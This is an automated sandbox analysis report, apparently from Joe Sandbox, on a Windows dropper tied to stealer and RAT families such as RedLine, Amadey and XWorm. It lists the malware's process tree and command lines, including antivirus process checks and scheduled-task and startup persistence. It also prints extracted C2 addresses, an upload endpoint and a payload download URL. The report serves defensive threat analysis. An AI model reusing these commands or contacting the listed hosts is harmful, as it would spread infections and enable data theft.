Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wfJfUGeGT3.exe

Overview

General Information

Sample name:wfJfUGeGT3.exe
renamed because original name is a hash value
Original sample name:046ebd7e0f619f33de609ea3f126b0d3.exe
Analysis ID:1502163
MD5:046ebd7e0f619f33de609ea3f126b0d3
SHA1:37a0b634955eb29f9bc7d3d434838cd729bb7e17
SHA256:bf554462c091219488a1a53fff22213df8d9530fa6ff0f59033b0c9ee9173555
Tags:exeFormbook
Infos:

Detection

Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, XWorm, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected Amadeys stealer DLL
Yara detected Cryptbot
Yara detected LummaC Stealer
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected XWorm
Yara detected zgRAT
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops certificate files (DER)
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wfJfUGeGT3.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\wfJfUGeGT3.exe" MD5: 046EBD7E0F619F33DE609EA3F126B0D3)
    • cmd.exe (PID: 7320 cmdline: "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7412 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7420 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7464 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7472 cmdline: findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7532 cmdline: cmd /c md 591950 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7548 cmdline: findstr /V "BachelorRayPotentialBeats" Itsa MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7564 cmdline: cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Shipment.pif (PID: 7580 cmdline: Shipment.pif E MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 7616 cmdline: cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7664 cmdline: schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
        • cmd.exe (PID: 7680 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & echo URL="C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • kitty.exe (PID: 7720 cmdline: "C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe" MD5: 0EC1F7CC17B6402CD2DF150E0E5E92CA)
          • schtasks.exe (PID: 7708 cmdline: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 7396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Cerker.exe (PID: 7056 cmdline: "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" MD5: 0EC1F7CC17B6402CD2DF150E0E5E92CA)
        • build2.exe (PID: 6056 cmdline: "C:\Users\user\AppData\Local\Temp\1000142101\build2.exe" MD5: F9A4F6684D1BF48406A42921AEBC1596)
        • contorax.exe (PID: 7868 cmdline: "C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe" MD5: 771B8E84BA4F0215298D9DADFE5A10BF)
          • winmsbt.exe (PID: 5512 cmdline: "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe" MD5: 771B8E84BA4F0215298D9DADFE5A10BF)
        • 3546345.exe (PID: 7096 cmdline: "C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe" MD5: FD2DEFC436FC7960D6501A01C91D893E)
        • meta.exe (PID: 3396 cmdline: "C:\Users\user\AppData\Local\Temp\1000194001\meta.exe" MD5: 3AACE51D76B16A60E94636150BD1137E)
          • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • RegAsm.exe (PID: 5504 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • InstallUtil.exe (PID: 4204 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
            • conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • GOLD.exe (PID: 8036 cmdline: "C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe" MD5: D6FCA3CD57293390CCF9D2BC83662DDA)
          • RegAsm.exe (PID: 384 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • RegAsm.exe (PID: 2316 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • RegAsm.exe (PID: 3472 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • crypteda.exe (PID: 1536 cmdline: "C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe" MD5: 8E74497AFF3B9D2DDB7E7F819DFC69BA)
          • RegAsm.exe (PID: 4500 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • choice.exe (PID: 7596 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 7732 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • GuardTrack.scr (PID: 7788 cmdline: "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • wscript.exe (PID: 7856 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • GuardTrack.scr (PID: 7896 cmdline: "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • Cerker.exe (PID: 2072 cmdline: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe MD5: 0EC1F7CC17B6402CD2DF150E0E5E92CA)
    • schtasks.exe (PID: 7800 cmdline: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Cerker.exe (PID: 5040 cmdline: "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" MD5: 0EC1F7CC17B6402CD2DF150E0E5E92CA)
    • schtasks.exe (PID: 2508 cmdline: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Cerker.exe (PID: 5804 cmdline: "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" MD5: 0EC1F7CC17B6402CD2DF150E0E5E92CA)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
CryptBotA typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 url": ["exonic-hacks.com"], "Port": "1920", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
{"C2 url": "193.176.158.185/B0kf3CbAbR/index.php", "Version": "4.41", "Install Folder": "fed0c9a4d3", "Install File": "Hkbsse.exe"}
{"C2 list": ["POST13vt.top", "analforeverlovyu.top", "+#thizx13vt.top", "13vt.top", "thizx13vt.top", "t.top", "+thizx13vt.top"]}
{"C2 url": "95.179.163.21:29257", "Bot Id": "LiveTraffic", "Message": "Disable Antivirus and try again", "Authorization Header": "143feb5082f9936e624c1e27545e7d19"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x115e8:$s6: VirtualBox
      • 0x11546:$s8: Win32_ComputerSystem
      • 0x14cd3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x14d70:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x14e85:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x13667:$cnc4: POST / HTTP/1.1
      C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        C:\Users\user\AppData\Roaming\D0nMCdvUeB.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
          Click to see the 10 entries
          SourceRuleDescriptionAuthorStrings
          0000001F.00000002.4168709454.0000000002A0F000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
          • 0x11c0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
          0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x12060:$s6: VirtualBox
            • 0x11fbe:$s8: Win32_ComputerSystem
            • 0x1574b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x157e8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x158fd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x140df:$cnc4: POST / HTTP/1.1
            0000001F.00000003.3728665099.0000000002B60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              00000033.00000002.3597562499.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Click to see the 16 entries
                SourceRuleDescriptionAuthorStrings
                43.2.GOLD.exe.3405570.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0xf7e8:$s6: VirtualBox
                    • 0xf746:$s8: Win32_ComputerSystem
                    • 0x12ed3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x12f70:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x13085:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x11867:$cnc4: POST / HTTP/1.1
                    51.2.RegAsm.exe.482060.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                      51.2.RegAsm.exe.482060.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        Click to see the 25 entries

                        System Summary

                        barindex
                        Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe, ProcessId: 7720, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Cerker.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7616, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F, ProcessId: 7664, ProcessName: schtasks.exe
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js", ProcessId: 7732, ProcessName: wscript.exe
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe, ProcessId: 7720, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Cerker.exe
                        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Shipment.pif E, CommandLine: Shipment.pif E, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7320, ParentProcessName: cmd.exe, ProcessCommandLine: Shipment.pif E, ProcessId: 7580, ProcessName: Shipment.pif
                        Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif, ProcessId: 7580, TargetFilename: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F, CommandLine: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe, ParentProcessId: 7720, ParentProcessName: kitty.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F, ProcessId: 7708, ProcessName: schtasks.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7616, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F, ProcessId: 7664, ProcessName: schtasks.exe
                        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif, ProcessId: 7580, TargetFilename: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr
                        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js", ProcessId: 7732, ProcessName: wscript.exe

                        Data Obfuscation

                        barindex
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7680, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url
                        No Suricata rule has matched

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: http://thizx13vt.top/vAvira URL Cloud: Label: malware
                        Source: http://thizx13vt.top/v1/upload.phpIqAvira URL Cloud: Label: malware
                        Source: http://thizx13vt.top/gAvira URL Cloud: Label: malware
                        Source: thizx13vt.topAvira URL Cloud: Label: malware
                        Source: http://thizx13vt.top/jAvira URL Cloud: Label: malware
                        Source: http://thizx13vt.top/xAvira URL Cloud: Label: malware
                        Source: http://185.216.214.225/freedom.exeAvira URL Cloud: Label: malware
                        Source: http://thizx13vt.top/v1/upload.phpM?Avira URL Cloud: Label: malware
                        Source: http://thizx13vt.top:80/v1/upload.phprazAvira URL Cloud: Label: malware
                        Source: http://thizx13vt.top/v1/upload.php%qNAvira URL Cloud: Label: malware
                        Source: http://thizx13vt.top/v1/upload.phpsrJGAvira URL Cloud: Label: malware
                        Source: http://thizx13vt.top/:FAvira URL Cloud: Label: malware
                        Source: http://thizx13vt.top/2Avira URL Cloud: Label: malware
                        Source: http://thizx13vt.top/)Avira URL Cloud: Label: malware
                        Source: http://thizx13vt.top/EAvira URL Cloud: Label: malware
                        Source: http://thizx13vt.top/FAvira URL Cloud: Label: malware
                        Source: http://thizx13vt.top/SAvira URL Cloud: Label: malware
                        Source: http://thizx13vt.top/NAvira URL Cloud: Label: malware
                        Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exeAvira: detection malicious, Label: HEUR/AGEN.1319014
                        Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeAvira: detection malicious, Label: TR/Spy.Gen
                        Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exeAvira: detection malicious, Label: TR/Crypt.XDR.Gen
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\contorax[1].exeAvira: detection malicious, Label: TR/Crypt.XDR.Gen
                        Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exeAvira: detection malicious, Label: HEUR/AGEN.1313066
                        Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeAvira: detection malicious, Label: HEUR/AGEN.1313066
